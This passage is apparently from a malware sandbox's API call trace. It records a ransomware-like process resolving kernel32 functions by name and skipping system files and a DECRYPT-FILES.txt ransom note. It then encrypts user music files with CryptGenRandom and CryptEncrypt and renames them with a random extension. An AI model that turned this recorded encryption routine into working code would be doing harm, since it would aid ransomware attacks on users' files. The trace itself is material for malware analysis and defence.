(in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.334] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.334] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.334] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.334] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.334] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.334] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.334] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.334] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.334] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.334] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.334] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.334] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.334] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.334] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.335] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.335] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.335] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.335] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.335] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.335] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.335] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.335] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.335] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.335] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.335] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.335] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.335] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.335] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.335] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.335] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.336] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.336] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a") returned 81 [0085.336] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a.h2S13R") returned 88 [0085.336] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\9w9ne up7xydvehiapy.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a.h2S13R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\9w9ne up7xydvehiapy.m4a.h2s13r"), dwFlags=0x0) returned 1 [0085.336] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.337] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.337] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.337] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31910e60, ftCreationTime.dwHighDateTime=0x1d4ca88, ftLastAccessTime.dwLowDateTime=0x5921a5d0, ftLastAccessTime.dwHighDateTime=0x1d4c924, ftLastWriteTime.dwLowDateTime=0x5921a5d0, ftLastWriteTime.dwHighDateTime=0x1d4c924, nFileSizeHigh=0x0, nFileSizeLow=0x1482b, dwReserved0=0x0, dwReserved1=0x0, cFileName="A81STbCNKpkh.wav", cAlternateFileName="A81STB~1.WAV")) returned 1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="DECRYPT-FILES.txt") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="autorun.inf") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="boot.ini") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="desktop.ini") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="ntuser.dat") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="iconcache.db") returned -1 [0085.337] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="bootsect.bak") returned -1 [0085.338] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="ntuser.dat.log") returned -1 [0085.338] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="thumbs.db") returned -1 [0085.338] lstrcmpiW (lpString1="A81STbCNKpkh.wav", lpString2="Bootfont.bin") returned -1 [0085.338] lstrlenW (lpString="A81STbCNKpkh.wav") returned 16 [0085.338] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.338] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.338] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.338] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.338] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.338] lstrlenW (lpString="A81STbCNKpkh.wav") returned 16 [0085.338] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.338] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="A81STbCNKpkh.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav" [0085.338] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\a81stbcnkpkh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.338] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=84011) returned 1 [0085.338] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.338] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.339] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.339] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.339] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.339] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.339] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.341] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.341] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.342] CloseHandle (hObject=0x43c) returned 1 [0085.342] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.342] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.343] CloseHandle (hObject=0x0) returned 0 [0085.343] CloseHandle (hObject=0x438) returned 1 [0085.343] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.343] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.344] GetTickCount () returned 0x114dca9 [0085.344] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.344] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.344] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.344] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.344] lstrlenA (lpString="kernel32.dll") returned 12 [0085.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.345] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.345] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.345] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.345] lstrlenA (lpString="ADDATOMA") returned 8 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.345] lstrlenA (lpString="ADDATOMW") returned 8 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.345] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.345] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.345] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.345] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.345] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.345] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.345] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.345] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.345] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.345] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.345] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.345] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.346] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.346] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.346] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.346] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.346] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.346] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.346] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.346] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.346] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.346] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.346] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.346] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.346] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.346] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.346] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.346] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.346] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.346] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.346] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.347] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.347] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.347] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.347] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.347] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.347] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.347] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.347] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.347] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.347] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.347] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.347] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.347] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.347] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.347] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.347] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.347] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.347] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.347] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.348] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.348] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.348] lstrlenA (lpString="BEEP") returned 4 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, 